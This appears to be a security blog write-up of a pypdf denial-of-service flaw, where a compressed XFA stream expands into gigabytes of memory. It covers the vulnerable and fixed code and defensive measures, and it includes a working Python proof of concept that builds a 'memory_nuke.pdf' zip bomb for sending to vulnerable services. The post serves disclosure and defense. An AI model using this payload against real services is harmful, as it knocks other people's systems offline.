Feb 26, 2026 · 5 min read
pypdf versions prior to 6.7.3 are vulnerable to a Denial of Service attack via the `xfa` property. An attacker can craft a tiny PDF with a highly compressed stream that expands to gigabytes in memory, crashing the Python process.
A critical resource exhaustion vulnerability in the popular pypdf library allows attackers to crash applications by supplying a malicious PDF. The flaw lies in the handling of XML Forms Architecture (XFA) streams, where a 'zip bomb' technique can trigger unbounded memory allocation.
If you've been in security for more than five minutes, you know that parsing untrusted file formats is the digital equivalent of licking a subway pole. PDFs are particularly egregious offenders. They aren't just documents; they are containers for images, fonts, JavaScript, and—thanks to Adobe's enterprise legacy—XML Forms Architecture (XFA).
pypdf is the go-to pure-Python library for handling these monstrosities. It's used everywhere: from RAG (Retrieval-Augmented Generation) pipelines extracting text for LLMs, to automated invoice processing systems in fintech. It's convenient, easy to install, and usually robust.
But here's the catch: convenience often comes at the cost of safety. In CVE-2026-27888, we find a classic 'zip bomb' vulnerability hiding inside the complex structure of XFA data. An attacker can send you a PDF that looks innocent, maybe a few megabytes on disk, but when your Python script reads its XFA data, it suddenly demands gigabytes of RAM (DEFLATE tops out near 1000:1, so every compressed megabyte can cost you about a gigabyte). The OS panics, the OOM killer wakes up, and your service goes dark. It's a beautifully simple Denial of Service.
The root cause here isn't some complex heap grooming or race condition. It's a failure of imagination regarding input validation. The vulnerability lives in `pypdf/_doc_common.py`, specifically in how the library fetches XFA data.
PDFs store XFA forms as streams. To save space, these streams are compressed, usually with FlateDecode (zlib). When you access `reader.xfa` or `writer.xfa`, pypdf needs to decompress that stream to give you the XML content.
Here is the logic flaw: The developers assumed that if a stream existed, it should be decompressed in its entirety into a single Python `bytes` object. There were no guardrails. No checks to ask, "Hey, should this 5 MB compressed blob really turn into a 4 GB bytes object?"
> [!NOTE]
> In the world of data compression, high ratios are easy to achieve if the data is repetitive. A stream of a billion 'A's compresses down to roughly a megabyte. If you blindly decompress it, you are handing the attacker a lever to exhaust your server's memory.
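To put a number on that note, here is a minimal sketch that measures how well a run of identical bytes compresses with the standard-library `zlib` module. The helper name `compression_ratio` is made up for this illustration and is not part of pypdf.

```python
import zlib


def compression_ratio(payload: bytes, level: int = 9) -> float:
    """Return uncompressed size divided by compressed size."""
    compressed = zlib.compress(payload, level)
    return len(payload) / len(compressed)


# 10 MiB of a single repeated byte: the best case for DEFLATE.
repetitive = b"A" * (10 * 1024 * 1024)
ratio = compression_ratio(repetitive)
print(f"ratio for repetitive data: {ratio:.0f}:1")
```

On typical builds the ratio lands on the order of 1000:1, which is close to the ceiling of the DEFLATE format. That ceiling is why a bomb needs about a megabyte on disk for every gigabyte it wants to burn.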
Let's look at the code. This is a perfect example of "it works until it doesn't." In versions prior to 6.7.3, the code looked something like this:

    # pypdf/_doc_common.py (Vulnerable)
    if isinstance(f, IndirectObject):
        field = cast(Optional[EncodedStreamObject], f.get_object())
        if field:
            # The fatal line:
            es = zlib.decompress(field._data)
            retval[tag] = es

See that `zlib.decompress(field._data)`? That is a loaded gun pointed at your RAM. zlib will happily keep allocating memory until the decompression is finished or your kernel kills the process. It doesn't care that you're running on a t3.micro instance.
Now, look at the fix introduced in commit 7a4c8246ed. The maintainers introduced a wrapper that knows when to say "stop."

    # pypdf/_doc_common.py (Fixed)
    from .filters import _decompress_with_limit  # <--- The Savior

    if field:
        # Safe decompression:
        es = _decompress_with_limit(field._data)
        retval[tag] = es

The `_decompress_with_limit` function uses `zlib.decompressobj` to decompress in chunks, tracking the total size and raising a `LimitReachedError` if it exceeds a predefined threshold (defaulting to a sane limit like 2 GB or less, configurable via `ZLIB_MAX_OUTPUT_LENGTH`).
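The general technique of bounded, chunked decompression can be sketched with nothing but the standard library. This is not pypdf's actual implementation: `decompress_with_cap`, `OutputLimitExceeded`, and the chunk size are hypothetical names and values chosen for this example.

```python
import zlib


class OutputLimitExceeded(Exception):
    """Hypothetical error for this sketch (not pypdf's LimitReachedError)."""


def decompress_with_cap(data: bytes, max_output: int, chunk_size: int = 64 * 1024) -> bytes:
    """Inflate `data`, refusing to produce more than `max_output` bytes."""
    decompressor = zlib.decompressobj()
    chunks = []
    total = 0
    pending = data
    while not decompressor.eof:
        # max_length caps the output of this single call; input that was
        # not consumed yet is handed back via unconsumed_tail.
        chunk = decompressor.decompress(pending, chunk_size)
        pending = decompressor.unconsumed_tail
        if not chunk and not pending:
            break  # no progress possible: the input ended early
        total += len(chunk)
        if total > max_output:
            raise OutputLimitExceeded(f"output exceeds {max_output} bytes")
        chunks.append(chunk)
    if not decompressor.eof:
        raise zlib.error("incomplete or truncated stream")
    return b"".join(chunks)
```

Because the total is checked after every chunk, the function never holds much more than `max_output` bytes of output, no matter how large the stream claims it wants to become.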
Exploiting this is trivial and requires no special tools—just a few lines of Python. We are going to build a valid PDF structure that contains a malicious XFA stream.
Here is the recipe for disaster:

1. Generate a large, highly repetitive payload (for example, 1 GB of a single byte).
2. Compress it using zlib with the highest compression level (9).
3. Embed the compressed stream in the /XFA array of the PDF's /AcroForm dictionary.

    # The "I hate your RAM" PoC
    import zlib

    from pypdf import PdfWriter
    from pypdf.generic import (
        ArrayObject,
        DictionaryObject,
        EncodedStreamObject,
        NameObject,
        TextStringObject,
    )

    # 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily)
    # In a real weaponized script, we'd stream this into the zlib compressor.
    payload = b'A' * (1024 * 1024 * 1024)

    # 2. Compress it. This shrinks to roughly 1 MB (DEFLATE tops out near 1000:1).
    compressed_data = zlib.compress(payload, level=9)

    # 3. Build the PDF structure
    writer = PdfWriter()
    writer.add_blank_page(width=72, height=72)

    # Create the stream object
    stream = EncodedStreamObject()
    stream._data = compressed_data
    stream[NameObject("/Filter")] = NameObject("/FlateDecode")

    # Attach it to the XFA array as a (name, indirect stream) pair, which is
    # the shape the vulnerable loop shown earlier iterates over
    xfa_array = ArrayObject([TextStringObject("template"), writer._add_object(stream)])
    acro_form = DictionaryObject()
    acro_form[NameObject("/XFA")] = writer._add_object(xfa_array)
    writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form)

    # 4. Save the bomb
    with open("memory_nuke.pdf", "wb") as f:
        writer.write(f)

Now, send memory_nuke.pdf to any service that uses a vulnerable pypdf to inspect metadata. As soon as they access the `xfa` property... BOOM. The process hangs, memory usage spikes vertically, and the service dies.
Why is this a big deal? Because we automate everything. Modern document processing pipelines often accept uploads from the public internet (resumes, invoices, legal forms). These pipelines often run in memory-constrained environments like AWS Lambda or Kubernetes pods.
If your application uses pypdf to check for form fields (`reader.get_form_text_fields()` often interacts with XFA components internally) or simply tries to extract all metadata for indexing, a single malicious user can take down your worker nodes.
This isn't just a crash; in a shared hosting environment or a poorly isolated container, this memory pressure can affect other neighbors or lock up the host system entirely. It's a low-effort, high-impact asymmetric attack.
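One way to contain that blast radius, independent of the library fix, is to parse untrusted files in a child process with a hard memory cap. The sketch below assumes a Linux host (it relies on `RLIMIT_AS`) and uses a hypothetical helper, `run_with_memory_cap`. A deliberately oversized allocation stands in for the PDF parsing step.

```python
import resource
import subprocess
import sys


def run_with_memory_cap(code: str, max_bytes: int, timeout: float = 30.0) -> subprocess.CompletedProcess:
    """Run a Python snippet in a child process whose address space is capped."""

    def limit_address_space() -> None:
        # Executed in the child just before the interpreter starts.
        resource.setrlimit(resource.RLIMIT_AS, (max_bytes, max_bytes))

    return subprocess.run(
        [sys.executable, "-c", code],
        preexec_fn=limit_address_space,
        capture_output=True,
        text=True,
        timeout=timeout,
    )


if __name__ == "__main__":
    one_gib = 1024 ** 3
    # Stand-in for "parse an untrusted PDF": try to allocate 2 GiB under a 1 GiB cap.
    result = run_with_memory_cap("data = bytearray(2 * 1024**3)", max_bytes=one_gib)
    print("child exit code:", result.returncode)
```

The child fails with a `MemoryError` while the parent keeps running and can reject the upload. A real worker would replace the stand-in snippet with its own parsing script.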
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

| Product | Affected Versions | Fixed Version |
|---|---|---|
| pypdf (py-pdf) | < 6.7.3 | 6.7.3 |
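To check an environment against the table above, a small script can compare the installed version with the fixed release. This is a simplified sketch: `parse_release` and `is_affected` are hypothetical helpers that only look at the leading numeric components, so pre-release suffixes are ignored.

```python
from importlib import metadata

FIXED_VERSION = (6, 7, 3)  # first release containing the fix, per the table above


def parse_release(version: str) -> tuple[int, ...]:
    """Extract the leading numeric components, e.g. '6.7.3.post1' -> (6, 7, 3)."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True if the given pypdf version predates the fixed release."""
    return parse_release(version) < FIXED_VERSION


try:
    installed = metadata.version("pypdf")
except metadata.PackageNotFoundError:
    installed = None

if installed is None:
    print("pypdf is not installed in this environment")
else:
    status = "AFFECTED, upgrade to 6.7.3 or later" if is_affected(installed) else "not affected"
    print(f"pypdf {installed}: {status}")
```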
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v4.0 | 6.6 (Medium) |
| Attack Vector | Network / Local |
| Exploit Status | PoC Available |
| Impact | Denial of Service (DoS) |
| Affected Component | pypdf.PdfReader.xfa |